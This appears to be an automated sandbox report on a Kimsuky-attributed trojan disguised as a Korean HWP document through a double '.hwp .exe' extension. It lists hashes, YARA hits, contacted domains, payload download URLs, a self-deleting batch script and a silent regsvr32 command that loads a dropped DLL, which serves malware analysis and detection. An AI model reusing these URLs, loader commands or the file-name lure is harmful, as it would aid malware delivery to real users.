popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

베트남 녹지원 상춘재 행사 견적서.hwp .exe

Generic Malware Malicious Library UPX MSOffice File PE File dll OS Processor Check PE32 DLL HWP DllRegisterServer
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 16, 2024, 6:28 p.m. Aug. 16, 2024, 6:30 p.m.
Size 468.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 35d60d2723c649c97b414b3cb701df1c
SHA256 6dfce07abc39e5d6aebd74a1850ad65cc6ce10a8540b551c4f6d441ec4cf48ab
CRC32 5C17FF35
ssdeep 3072:Gbd/5pl6sI/8EOoulXCjiaOOsJpAG9BU1cdvjbE:sdrI/XOlVaOO4zUM0
PDB Path E:\pc\makeHwp\Bin\makeHwp.pdb
Yara
  • HWP_file_format - HWP Document File
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • DllRegisterServer_Zero - execute regsvr32.exe
  • Microsoft_Office_File_Zero - Microsoft Office File
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
gaja79.com
A 182.162.73.77
182.162.73.77
antichrist.or.kr
A 182.162.73.77
182.162.73.77
IP Address Status Action
164.124.101.2 Active Moloch
182.162.73.77 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: del
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: "C:\Users\test22\AppData\Local\Temp\??? ??? ??? ?? ???.hwp .exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: if
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: exist "C:\Users\test22\AppData\Local\Temp\??? ??? ??? ?? ???.hwp .exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: goto
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Repeat1
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: del
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: "C:\Users\test22\AppData\Local\Temp\rns.bat"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0
pdb_path E:\pc\makeHwp\Bin\makeHwp.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name BINARY
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
rundll32+0x135c @ 0x72135c
rundll32+0x1901 @ 0x721901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 784480
registers.edi: 0
registers.eax: 44403344
registers.ebp: 784508
registers.edx: 1
registers.ebx: 0
registers.esi: 5557552
registers.ecx: 1931818460
1 0 0
request GET http://antichrist.or.kr/data/cheditor/dir1/lyric64
request GET http://gaja79.com/link/fow-mh1004.html
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bd4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73951000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75591000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x735d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bd4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73951000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73351000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72be4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73352000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75e61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76161000
process_handle: 0xffffffff
1 0 0
name BINARY language LANG_KOREAN filetype PE32 executable (DLL) (GUI) Intel 80386, for MS Windows sublanguage SUBLANG_KOREAN offset 0x00056c00 size 0x0001b400
name BINARY language LANG_KOREAN filetype PE32 executable (DLL) (GUI) Intel 80386, for MS Windows sublanguage SUBLANG_KOREAN offset 0x00056c00 size 0x0001b400
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_ICON language LANG_KOREAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_KOREAN offset 0x00056738 size 0x00000468
name RT_STRING language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x00075800 size 0x0000004c
name RT_GROUP_ICON language LANG_KOREAN filetype data sublanguage SUBLANG_KOREAN offset 0x00056ba0 size 0x0000005a
file C:\Users\test22\AppData\Local\Temp\rns.bat
cmdline regsvr32.exe /s /n /i NewACt.dat
cmdline "C:\Windows\System32\regsvr32.exe" /s /n /i NewACt.dat
file C:\Users\test22\AppData\Local\Temp\rns.bat
file C:\Users\test22\AppData\Roaming\Microsoft\NewACt.dat
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\rns.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\rns.bat
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: regsvr32.exe
parameters: /s /n /i NewACt.dat
filepath: regsvr32.exe
1 1 0
Lionic Trojan.Win32.RunDll.tr9E
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.PUPXAF.gt
ALYac Trojan.Agent.479232K
Cylance unsafe
VIPRE Dropped:Trojan.GenericKD.42082389
Sangfor Trojan.Win32.Kimusky.PA
K7AntiVirus Riskware ( 0040eff71 )
BitDefender Dropped:Trojan.GenericKD.42082389
K7GW Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D2822055
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kimsuky.L
McAfee Artemis!35D60D2723C6
Avast Win32:Malware-gen
Kaspersky Trojan.Win32.RunDll.acja
Alibaba Trojan:Win32/RunDll.2a990a0c
NANO-Antivirus Trojan.Win32.RunDll.hcruhh
MicroWorld-eScan Dropped:Trojan.GenericKD.42082389
Rising Trojan.Generic@AI.94 (RDML:K6Ty4w3M9JwFVXLyEX/S5Q)
Emsisoft Dropped:Trojan.GenericKD.42082389 (B)
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.PWS.Siggen2.40052
Zillya Trojan.Agent.Win32.1210553
TrendMicro TROJ_KSDOORLDR.ZJGL-A
FireEye Generic.mg.35d60d2723c649c9
Sophos Mal/Generic-S
Ikarus Trojan.Dropper
Jiangmin Trojan.Rundll.xr
Webroot W32.Gen.BT
Google Detected
Avira TR/Dropper.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan/Win32.Kimsuky
Xcitium Malware@#37fplx3tp6d8
Microsoft Trojan:Win32/Kimusky.PA!MTB
ViRobot Dropper.S.Agent.479232.A
ZoneAlarm Trojan.Win32.RunDll.acja
GData Dropped:Trojan.GenericKD.42082389
Varist W32/ABTrojan.JOPL-1101
AhnLab-V3 Backdoor/Win32.Kimsuky.R302020
BitDefenderTheta Gen:NN.ZexaF.36804.DuW@aOvXtLdO
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Kimsuky
Malwarebytes Generic.Malware/Suspicious
Panda Trj/CI.A
TrendMicro-HouseCall TROJ_KSDOORLDR.ZJGL-A
Tencent Win32.Trojan.Rundll.Ekjl
Yandex Trojan.RunDll!+lEZb2zXVaM